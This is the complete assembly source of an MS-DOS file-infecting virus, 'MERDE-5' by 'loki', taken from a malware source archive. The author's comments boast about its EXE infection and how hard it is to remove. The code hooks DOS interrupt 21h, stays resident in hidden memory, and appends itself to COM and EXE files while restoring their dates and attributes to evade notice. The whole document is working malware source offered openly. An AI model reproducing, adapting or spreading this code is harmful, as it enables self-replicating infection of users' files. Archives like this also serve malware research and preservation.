MalwareSourceCode/MSDOS/L-Index/Virus.MSDOS.Unknown.loki1237.asm

613 lines
11 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
; Okay, here is my newest version.. It now
; offers EXE infection. I messed up command.com
; compatibility so this version won't infect it.
; Also, this version might be a little shakey,
; but it should work okay with most setups
; (I'm not professional yet, so screw 'em
; if this hangs!)..
; This will be the last time I release code for
; my virii. Thanks to firststrike, and anyone else
; who has given me tips.....
; Be careful not to get this, it is kinda hard to get rid
; of (it would be REALLY hard to get rid of if it infected
;command.com- I will have to fix that (along with the TERRIBLE
; inefficiency in my interrupt handler (the loader is OKAY, but
; My_21 is just kind of a jumble of code thrown together for now.
; If you want to vaccinate your system, and you know a little about
; assembler, it isn't that hard. (I gave the come version to
; myself about 3 times). Just take notice of my use of interrupt
; 71...(This will be changed in future versions, for obvious reasons).
; MERDE-5 The merde virus version 5.0- loki
compare_val equ 850
interrupt equ 21h
Code_seg Segment Byte
Assume DS:Code_seg, CS:Code_seg
ORG 100h
start: call get_ip
exe_or_com:
dw 'CO'
get_ip:
pop di
sub di,3
cmp word ptr cs:[di+3],'EX'
jne com_memory_loader
jmp exe_memory_loader
;Load memory from within an EXE file..
;------------------------------------------------------------------------------
exe_memory_loader:
call check_for_int_71
jc go
call get_memory ;es=my_segment
jnc aaaa
jmp exit_exe
aaaa:
call hide_memory
call set_int_71
call save_21
push ds
call move_all_code
pop ds
mov bx,es
call set_21
go: jmp exit_exe
;------------------------------------------------------------------------------
;******************************************************************************
;------------------------------------------------------------------------------
;load memory from a COM file...
com_memory_loader:
call restore_com
call check_for_int_71
jc go_1
call get_memory
jnc bbbb
jmp exit_com
bbbb: call hide_memory
reset_di:
call set_int_71
call save_21
call move_all_code
mov bx,es
call set_21
go_1: jmp exit_com
;------------------------------------------------------------------------------
;Returns ES with my segment (or an error)
;------------------------------------------------------------------------------
get_memory:
int 12h
mov bx,cs
mov cx,1024
mul cx
clc
mov cx,600h ;Amount of needed memory
sub ax,cx
sbb dx,0000 ;dx:ax=where we want this mem to end!
mov bx,dx
mov bp,ax ;save this...
mov cx,cs
mov ax,0010h
mul cx
clc
mov cx,di
add cx,offset ending-100h
add ax,cx
adc dx,0000
clc
sub bp,ax
sbb bx,dx
clc
mov ax,bp
mov dx,bx
mov cx,0010h
div cx ;dx:ax=memory above this-divide it by 16
mov bx,ax
mov ah,4ah
int 21h
jc get_memory_error
mov bx,60
mov ah,48h
int 21h
jc get_memory_error
mov es,ax
clc
ret
get_memory_error:
stc
ret
;------------------------------------------------------------------------------
;Moves all code + PSP to my secretive little segment-destroys DS (in EXE files)
;------------------------------------------------------------------------------
move_all_code:
;move PSP**************************
push di
xor si,si
xor di,di
mov cx,100h
rep movsb
;**********************************
;move my code**********************
pop si
push si
push cs
pop ds
mov cx,offset ending-100h
rep movsb
pop di
ret
;**********************************
;------------------------------------------------------------------------------
;------------------------------------------------------------------------------
;saves interrupt 21 in cs:[int_21_saveo]
save_21:
push es
xor ax,ax
mov es,ax
mov ax,es:[interrupt*4]
mov bx,es:[interrupt*4+2]
mov cs:[di+offset int_21_saveo-100h],ax
mov cs:[di+offset int_21_saves-100h],bx
pop es
ret
;-----------------------------------------------------------------------------
;sets interrupt 21 to bx:offset of my_21
set_21:
push es
xor ax,ax
mov es,ax
mov es:[interrupt*4],offset my_21
mov es:[interrupt*4+2],bx
pop es
ret
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
;Restores a COM file
restore_com:
push di
mov si,di
add si,offset three_bytes-100h
mov di,0100h
mov cx,3
rep movsb
pop di
ret
;------------------------------------------------------------------------------
;Hides my segment's (es) size and owner
hide_memory:
push ds
xor cx,cx
mov ds,cx
mov cx,ds:[2eh*4+2]
pop ds
push ds
mov dx,es
dec dx
mov ds,dx
mov ds:[1],cx ;maybe later set to DOS seg
mov byte ptr ds:[0],'Z'
mov word ptr ds:[3],0000
mov es:[16h],cx
mov es:[0ah],cx
mov es:[0ch],cx
pop ds
ret
;------------------------------------------------------------------------------
;check_for_int 71- My little multiplex interrupt
check_for_int_71:
int 71h
cmp ax,9999h
je set_c
clc
ret
set_c:
stc
ret
;------------------------------------------------------------------------------
;Set interrupt 71:
set_int_71:
push ds
xor ax,ax
mov ds,ax
mov ds:[71h*4+2],es
mov ds:[71h*4],offset my_71
pop ds
ret
exit_com:
xor cx,cx
xor dx,dx
xor ax,ax
xor bx,bx
xor si,si
xor di,di
mov ax,100h
jmp ax
exit_exe:
push ds
pop es
mov ax,es
add ax,10h
add word ptr cs:[di+offset orig_cs-100h],ax
cli
add ax,word ptr cs:[di+offset orig_ss-100h]
mov ss,ax
mov sp,word ptr cs:[di+offset orig_sp-100h]
sti
jmp dword ptr cs:[di+offset orig_ip-100h]
;------------------------------------------------------------------
my_21:
cmp ah,4bh
je okay_go
cmp ah,0fh
je okay_go
cmp ah,3dh
je okay_go
cmp ah,43h
je okay_go
jmp continue_21
okay_go:
push ax
push bx
push cx
push dx
push es
push di
push si
push bp
push es
push ds
check_for_com:
xor si,si
mov bx,dx
looper:
cmp word ptr ds:[bx+si],'c.'
je check_om
cmp word ptr ds:[bx+si],'C.'
je check_om
cmp word ptr ds:[bx+si],'e.'
je check_ex
cmp word ptr ds:[bx+si],'E.'
je check_ex
inc si
cmp si,40
jne looper
jmp give_up1
check_om:
cmp word ptr ds:[bx+si+2],'mo'
jne bb
mov cs:[com_or_exe],0
jmp check_for_infection
bb: cmp word ptr ds:[bx+si+2],'MO'
jne cc
mov cs:[com_or_exe],0
jmp check_for_infection
cc: jmp give_up1
check_ex:
cmp word ptr ds:[bx+si+2],'ex'
jne label1
mov cs:[com_or_exe],1234h
jmp okay_do
label1:
cmp word ptr ds:[bx+si+2],'EX' ;FIX ME!!!!!!!
je cccc ;forget exe for now..
jmp give_up1
cccc:
mov cs:[com_or_exe],1234h
jmp okay_do
check_for_infection:
cmp word ptr [bx+si-2],'DN'
jne okey_k
jmp give_up1
okey_k:
cmp word ptr [bx+si-2],'DN'
jne okay_do
jmp give_up1
okay_do:
mov cs:[storage_1],ds
mov cs:[storage_2],dx
mov ah,50h ;set PSP to ours
push cs
pop bx
call dos_21
mov ah,43h
xor al,al
call dos_21
jnc okay9
jmp give_up
okay9: mov cs:[attrib],cx
mov ah,43h
mov al,1
xor cx,cx
call dos_21
mov ah,3dh
mov al,2
call dos_21
jnc okay10
jmp give_up
okay10: mov cs:[handle],ax
mov bx,ax
mov ah,57h
xor al,al
call dos_21
mov cs:[date],dx
mov cs:[time],cx
mov ax,4202h
xor dx,dx
xor cx,cx
call dos_21
jnc okay11
jmp give_up
okay11: mov cs:[file_size],ax
cmp cs:[com_or_exe],1234h
jne okey_p
sub ax,compare_val
sbb dx,0000
mov cx,dx
mov dx,ax
jmp contin2
okey_p: xor cx,cx
cmp ax,63000
jb contin1
call reset_all
jmp give_up
contin1:
cmp ax,600
jnb continx
call reset_all
jmp give_up
continx:
sub ax,compare_val
mov dx,ax
xor cx,cx
contin2:
mov ax,4200h
mov bx,cs:[handle]
call dos_21
mov ah,3fh
push cs
pop ds
mov dx,offset buffer
mov cx,2
call dos_21
mov ax,word ptr cs:[buffer]
mov bx,word ptr cs:[offset dont_write-compare_val]
cmp ax,bx
jne dddd
jmp give_up
dddd:
cmp cs:[com_or_exe],1234h
je infect_exe
jmp infect_com
infect_exe:
mov bx,cs:[handle]
xor dx,dx
xor cx,cx
mov ax,4200h
call dos_21
push cs
pop ds
mov ah,3fh
mov cx,18h
mov dx,offset header
call dos_21
cmp word ptr [header+8],1000h
jb okayh
call reset_all
jmp give_up
okayh: mov ax,word ptr [header+16h]
mov orig_cs,ax
mov ax,word ptr [header+14h]
mov orig_ip,ax
mov ax,word ptr [header+0eh]
mov orig_ss,ax
mov ax,word ptr [header+10h]
mov orig_sp,ax
mov ax,4202h
mov bx,handle
xor cx,cx
xor dx,dx
call dos_21
mov word ptr ds:[exe_or_com],'EX'
mov high_size,dx
mov low_size,ax
mov real_hsize,dx
mov real_lsize,ax
mov ax,word ptr [header+8]
mov cx,10h
mul cx
clc
sub low_size,ax ;high_size:low_size=load size
sbb high_size,dx
clc
mov dx,high_size
mov ax,low_size
mov cx,0010h
div cx
cmp dx,0
je okay
mov cx,16
sub cx,dx
mov bp,cx
add real_lsize,bp
adc real_hsize,0000
clc
stc
adc ax,0000
jmp okay1
okay: xor bp,bp
okay1: xor dx,dx
mov word ptr [header+16h],ax
;add to dx?
mov word ptr [header+14h],dx
mov word ptr [header+0eh],ax
mov dx,0fffeh
mov word ptr [header+10h],dx
mov dx,real_hsize
mov ax,real_lsize
add ax,offset ending-100h+1
adc dx,0000
push ax
mov cl,9
shr ax,cl
ror dx,cl
stc
adc dx,ax
pop ax
and ah,1
mov word ptr [header+4],dx
mov word ptr [header+2],ax
mov ah,40h
mov bx,handle
mov cx,offset dont_write-100h
add cx,bp
mov dx,100h
sub dx,bp
call dos_21
mov ax,4200h
xor cx,cx
xor dx,dx
mov bx,handle
call dos_21
mov ah,40h
mov bx,handle
mov cx,18h
mov dx,offset header
call dos_21
call reset_all
jmp give_up
infect_com:
xor cx,cx
xor dx,dx
mov bx,cs:[handle]
mov ax,4200h
call dos_21
mov ah,3fh
mov cx,3
push cs
pop ds
mov dx,offset three_bytes
call dos_21
mov ax,cs:[file_size]
sub ax,3
mov word ptr cs:[jumper+1],ax
mov word ptr cs:[exe_or_com],'CO'
call write_to_end
xor cx,cx
xor dx,dx
mov ax,4200h
mov bx,cs:[handle]
call dos_21
mov dx,offset jumper
mov ah,40h
mov cx,3
call dos_21
call reset_all
give_up:
mov ah,50h
mov bx,cs:[storage_1]
call dos_21
give_up1:
pop ds
pop es
pop bp
pop si
pop di
pop es
pop dx
pop cx
pop bx
pop ax
jmp continue_21
continue_21:
jmp dword ptr cs:[int_21_saveo]
dos_21:
pushf
call dword ptr cs:[int_21_saveo]
ret
reset_all:
mov bx,cs:[handle]
mov cx,cs:[time]
mov dx,cs:[date]
mov ax,5701h
call dos_21
mov ah,3eh
mov bx,cs:[handle]
call dos_21
mov ah,43h
mov al,1
mov cx,cs:[attrib]
mov ds,cs:[storage_1]
mov dx,cs:[storage_2]
call dos_21
ret
write_to_end:
mov ax,4202h
xor dx,dx
xor cx,cx
mov bx,cs:[handle]
call dos_21
mov ah,40h
mov cx,offset dont_write-100h
push cs
pop ds
mov dx,0100h
call dos_21
ret
my_71:
mov ax,9999h
iret
jumper:
db 0e9h,00,00
storage_1 dw 0000
storage_2 dw 0000
int_21_saveo dw 0000
int_21_saves dw 0000
three_bytes: db 0cdh,20h,90h
db 'Loki'
orig_ip dw 0000
orig_cs dw 0000
orig_ss dw 0000
orig_sp dw 0000
dont_write:
header:
db 24 dup(00)
com_or_exe dw 1234h
handle dw 0000
file_size dw 0000
attrib dw 0000
date dw 0000
time dw 0000
buffer: dw 0000
loader_high dw 0000
loader_low dw 0000
header_cs dw 0000
header_ip dw 0000
low_size dw 0000
high_size dw 0000
real_hsize dw 0000
real_lsize dw 0000
ending:
Code_seg ENDS
2021-01-12 23:47:04 +00:00
END start